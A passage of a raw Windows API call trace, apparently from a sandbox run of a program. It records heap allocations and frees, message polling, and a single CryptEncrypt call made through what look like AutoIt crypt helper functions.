lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0247.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0247.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0247.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0247.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0247.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0247.991] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0247.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0247.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0247.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0247.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699e8 [0247.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0247.992] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0247.992] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0247.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0247.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0247.992] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0247.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0247.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0247.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517f0 [0247.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0247.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0247.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0247.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b88 [0247.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51850 [0247.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0247.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0247.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0247.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0247.993] CharLowerBuffW (in: lpsz="byte[18664]", cchLength=0xb | out: lpsz="byte[18664]") returned 0xb [0247.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977b48 [0247.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0247.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0247.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0247.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0247.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0247.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0247.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0247.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0247.993] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0247.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51688 [0247.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51718 [0247.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0247.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69bc8 [0247.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c68 [0247.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0247.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0247.994] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0247.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0247.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51700 [0247.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0247.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0247.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e56098 [0247.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0247.994] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0248.033] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0248.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0248.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0248.034] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0248.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0248.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0248.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0248.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0248.034] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0248.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e51a78 [0248.034] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51a78, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0248.034] CryptEncrypt (in: hKey=0xa87490, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f1d1f0*, pdwDataLen=0x8cef60*=0x48e1, dwBufLen=0x48e8 | out: pbData=0x2f1d1f0*, pdwDataLen=0x8cef60*=0x48e8) returned 1 [0248.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0248.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0248.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0248.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0248.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0248.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0248.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0248.035] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0248.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0248.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0248.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0248.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b88 [0248.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0248.036] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0248.036] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0248.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0248.036] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0248.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0248.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0248.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0248.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0248.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69c08 [0248.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9779f8 [0248.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0248.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0248.036] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0248.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0248.036] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0248.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0248.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0248.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0248.036] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0248.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0248.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0248.037] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0248.037] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0248.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ca8 [0248.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0248.037] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0248.037] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0248.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0248.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0248.037] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0248.037] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0248.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0248.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55c70 [0248.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0248.037] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0248.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55c70 | out: hHeap=0x970000) returned 1 [0248.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0248.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e516a0 [0248.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0248.037] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0248.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0248.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0248.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0248.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0248.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0248.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0248.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0248.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0248.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0248.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0248.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0248.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0248.038] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0248.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0248.038] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0248.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0248.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0248.038] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0248.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0248.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0248.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0248.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0248.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0248.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0248.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0248.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0248.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0248.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0248.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0248.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x48e8) returned 0x2f21ae0 [0248.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0248.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0248.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x48e8) returned 0x2f2acc0 [0248.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0248.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0248.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f21ae0 | out: hHeap=0x970000) returned 1 [0248.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0248.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0248.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0248.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0248.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0248.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x48e8) returned 0x2f21ae0 [0248.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f2acc0 | out: hHeap=0x970000) returned 1 [0248.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0248.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0248.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x48e8) returned 0x2f2acc0 [0248.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f21ae0 | out: hHeap=0x970000) returned 1 [0248.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0248.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0248.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0248.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0248.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0248.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0248.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0248.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0248.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0248.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0248.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0248.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0248.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0248.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977ae8 | out: hHeap=0x970000) returned 1 [0248.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0248.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0248.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0248.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0248.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0248.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0248.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e563c8 | out: hHeap=0x970000) returned 1 [0248.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517d8 | out: hHeap=0x970000) returned 1 [0248.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0248.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0248.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0248.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0248.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0248.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0248.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0248.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0248.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0248.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977c08 | out: hHeap=0x970000) returned 1 [0248.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0248.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f1d1f0 | out: hHeap=0x970000) returned 1 [0248.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0248.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0248.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0248.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0248.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0248.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0248.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0248.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0248.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0248.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0248.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0248.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0248.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0248.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0248.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0248.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0248.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0248.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f18900 | out: hHeap=0x970000) returned 1 [0248.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0248.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0248.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0248.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0248.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0248.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f263d0 | out: hHeap=0x970000) returned 1 [0248.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0248.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0248.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0248.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0248.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0248.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: 